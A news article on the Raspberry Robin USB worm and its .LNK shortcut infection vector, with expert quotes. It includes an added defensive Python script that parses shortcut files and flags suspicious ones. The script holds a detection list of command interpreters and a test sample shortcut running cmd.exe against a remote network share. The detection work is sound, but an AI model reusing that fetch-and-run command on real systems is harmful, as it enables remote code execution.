Microsoft has warned of a new type of malware, one that has triggered payload alerts on devices of almost 1,000 organizations since the fourth quarter of 2022. The dangerous new code has been used to introduce ransomware.
The code is ‘Raspberry Robin’, and this unusually named worm has been involved in attacks on telecommunications providers during December 2022, including entities in Latin America, Oceania (Australia), and Europe. Raspberry Robin is typically introduced via infected removable drives, often USB devices. Commonly the malware is associated with a ‘.LNK’ (Windows shortcut) file and is activated when that shortcut is double-clicked.
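Because the infection vector described above is a shortcut file on a removable drive, a defender's first question is what a given ‘.LNK’ actually launches. The following is an added example, not code from the article or from Skybox Security: a minimal parser for the Windows Shell Link binary format (the ShellLinkHeader, an optional LinkTargetIDList and LinkInfo which are skipped, and the StringData fields that hold the target path, working directory and arguments), plus a triage routine that flags shortcuts pointing at a command interpreter or script host, referencing a UNC path or URL, or carrying an unusually long argument string. The two sample shortcut files are constructed in the script itself, and the triage heuristics and the thresholds are the example's own assumptions rather than anything the article states about Raspberry Robin.

```python
"""Parse Windows .LNK (Shell Link) files and flag shortcuts worth a closer look."""
import os
import struct
import sys

# Shell Link CLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HEADER_SIZE = 0x4C

# LinkFlags bits relevant to this parser.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this fixed order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Example's own heuristic list: targets that execute something other than themselves.
INTERPRETERS = ("cmd", "powershell", "pwsh", "wscript", "cscript", "mshta",
                "rundll32", "regsvr32", "msiexec")
LONG_ARGS_THRESHOLD = 200  # assumed threshold for "unusually long" arguments


def is_lnk(data: bytes) -> bool:
    """True if the buffer starts with a valid ShellLinkHeader."""
    return len(data) >= HEADER_SIZE and struct.unpack_from("<I16s", data, 0) == (HEADER_SIZE, LNK_CLSID)


def _read_string(data: bytes, pos: int, unicode: bool):
    """Read one StringData entry: a 2-byte character count followed by the characters."""
    (count,) = struct.unpack_from("<H", data, pos)
    pos += 2
    nbytes = count * 2 if unicode else count
    raw = data[pos:pos + nbytes]
    if len(raw) != nbytes:
        raise ValueError("truncated StringData")
    text = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", errors="replace")
    return text, pos + nbytes


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .LNK file; raises ValueError on malformed input."""
    if not is_lnk(data):
        raise ValueError("not a Shell Link (.LNK) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:          # skip the IDList (size excludes its own 2-byte field)
        (id_list_size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + id_list_size
    if flags & HAS_LINK_INFO:                    # skip LinkInfo (size includes its own 4-byte field)
        (link_info_size,) = struct.unpack_from("<I", data, pos)
        pos += link_info_size
    if pos > len(data):
        raise ValueError("truncated IDList or LinkInfo")
    info = {}
    for flag, key in STRING_FIELDS:
        if flags & flag:
            info[key], pos = _read_string(data, pos, bool(flags & IS_UNICODE))
    return info


def triage(info: dict) -> list:
    """Apply the example's heuristics; returns a list of human-readable reasons (empty = nothing noted)."""
    target = (info.get("relative_path") or "").lower()
    args = (info.get("arguments") or "").lower()
    base = target.replace("\\", "/").rsplit("/", 1)[-1]
    reasons = []
    if base.rsplit(".", 1)[0] in INTERPRETERS:
        reasons.append(f"target is a command interpreter or script host: {base}")
    if "http://" in args or "https://" in args or "\\\\" in args or "\\\\" in target:
        reasons.append("references a URL or UNC network path")
    if len(args) > LONG_ARGS_THRESHOLD:
        reasons.append(f"argument string longer than {LONG_ARGS_THRESHOLD} characters")
    return reasons


def build_sample_lnk(relative_path: str, working_dir: str, arguments: str = "") -> bytes:
    """Construct a minimal unicode .LNK with a tiny IDList, for offline testing only."""
    flags = HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_WORKING_DIR | IS_UNICODE
    if arguments:
        flags |= HAS_ARGUMENTS
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    id_list = struct.pack("<H", 6) + struct.pack("<H", 4) + b"AB" + b"\x00\x00"
    pack = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    body = pack(relative_path) + pack(working_dir) + (pack(arguments) if arguments else b"")
    return header + id_list + body


# Constructed samples: a benign document shortcut and one that launches cmd.exe against a UNC path.
BENIGN_LNK = build_sample_lnk("Documents\\Quarterly Report.docx", "E:\\")
SUSPICIOUS_LNK = build_sample_lnk("..\\..\\Windows\\System32\\cmd.exe", "E:\\",
                                  "/c \\\\192.0.2.10\\share\\update.cmd")


def scan_directory(root: str) -> list:
    """Walk a mounted drive or folder and return (path, reasons) for every flagged .LNK."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".lnk"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    data = fh.read()
                if is_lnk(data):
                    reasons = triage(parse_lnk(data))
                    if reasons:
                        findings.append((path, reasons))
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, reasons in scan_directory(sys.argv[1]):
            print(path, "->", "; ".join(reasons))
    else:
        for label, blob in (("benign", BENIGN_LNK), ("suspicious", SUSPICIOUS_LNK)):
            print(label, parse_lnk(blob), triage(parse_lnk(blob)))
```

Run it with a mount point (for example the drive letter of a removable device) to list flagged shortcuts, or with no arguments to see the two constructed samples parsed and triaged. The parser deliberately stops after StringData and ignores the ExtraData blocks, which is enough to answer "what does this shortcut run"; a production tool would also record the shortcut's file hash and the volume it came from for the incident timeline.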
Looking into this new cybersecurity threat for Digital Journal is Terry Olaes, Senior Technical Director at Skybox Security.
Olaes begins by looking at the specific threat and malware issues in general, noting: “Skybox Research Lab found that the malware industry has continuously churned an array of malicious software, including cryptojacking and ransomware programs, which increased by 75 percent and 42 percent, respectively, in 2021.”
With the recent incident, Olaes states: “Now Raspberry Robin, which caught headlines in May for its prolific worm-like spreading once a beachhead is established, has evolved its capabilities to improve detection evasion via fake payload drops if the malware detects sandboxing or being analyzed.”
Olaes’s analysis goes further into the origins of the malicious code: “This implant is also part of the larger malware ecosystem and has been observed being a part of a threat stack in several campaigns.”
In terms of how the threat becomes manifest, Olaes observes: “Threat actors often sell access to compromised networks to ransomware and malware platforms, including the recent attacks involving Clop gang, IcedID, Bumblebee and Truebot. In this recent update, Raspberry Robin has drastically improved its obfuscation layers (10 or more) and evasive capabilities, highlighting the constant innovation bad actors are able to employ while leveraging tried-and-true human behavior (inserting unknown USB drives) to establish access.”
In order to protect businesses from such incidents, Olaes recommends: “It is essential that organizations adopt a proactive approach to vulnerability management that involves evaluating the entire threat landscape to identify exposed vulnerabilities. An essential step to reducing malware is to enhance the overall maturity of an organization’s vulnerability management program to ensure prompt remediation rather than a focus on time-consuming and costly reactive activities.”
Olaes also advises: “Additionally, implementing a solution capable of quantifying the business impact of cyber risk into the economic impact will help organizations determine the level of urgency.”